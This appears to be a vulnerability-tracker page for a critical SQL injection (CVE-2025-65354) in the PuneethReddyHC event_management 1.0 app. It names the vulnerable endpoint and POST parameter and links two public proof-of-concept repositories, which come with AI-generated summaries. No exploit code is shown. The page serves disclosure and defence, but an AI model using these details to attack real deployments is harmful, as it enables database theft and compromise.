CVE-2025-65354

CRITICAL

PuneethReddyHC event_management 1.0 - SQL Injection via sitem_name POST Parameter

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 2 public exploits for CVE-2025-65354. PoCs published by amaansiddd787, EarthAngel666.

AI-analyzed exploit summary This repository contains a writeup detailing a SQL injection vulnerability (CVE-2025-65354) in the PuneethReddyHC event-management application v1.0. The vulnerability allows remote, unauthenticated attackers to manipulate SQL queries via the `sitem_name` POST parameter.

Description

Improper input handling in /Grocery/search_products_itname.php inPuneethReddyHC event-management 1.0 permits SQL injection via the sitem_name POST parameter. Crafted payloads can alter query logic and disclose database contents. Exploitation may result in sensitive data disclosure and backend compromise.

Exploits (2)

nomisec WRITEUP 1 stars
by amaansiddd787 · poc
https://github.com/amaansiddd787/CVE-2025-65354

This repository contains a writeup detailing a SQL injection vulnerability (CVE-2025-65354) in the PuneethReddyHC event-management application v1.0. The vulnerability allows remote, unauthenticated attackers to manipulate SQL queries via the `sitem_name` POST parameter.

Classification
Writeup 90%
Attack Type
Sqli
Complexity
Trivial
Reliability
Reliable
Target: PuneethReddyHC event-management v1.0
No auth needed
Prerequisites: Access to the vulnerable endpoint /Grocery/search_products_itname.php
devstral-2 · analyzed Feb 16, 2026 Full analysis →
nomisec WORKING POC
by EarthAngel666 · poc
https://github.com/EarthAngel666/CVE-2025-65354

This PoC demonstrates a SQL injection vulnerability in a web application by sending crafted HTTP headers with malicious SQL payloads. It tests for boolean-based blind SQLi by comparing responses to true/false conditions.

Classification
Working Poc 80%
Attack Type
Sqli
Complexity
Trivial
Reliability
Reliable
Target: Unknown (Grocery/search_products_itname.php endpoint)
No auth needed
Prerequisites: Network access to the target endpoint · Python environment with requests library
devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (1)

Core 1
Core References
Exploit, Third Party Advisory
https://github.com/amaansiddd787/CVE-2025-65354

Scores

CVSS v3 9.8
EPSS 0.0048
EPSS Percentile 37.2%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation poc
Automatable yes
Technical Impact total

Details

CWE
CWE-89
Status published
Products (1)
puneethreddyhc/event_management 1.0
Published Dec 23, 2025
Tracked Since Feb 18, 2026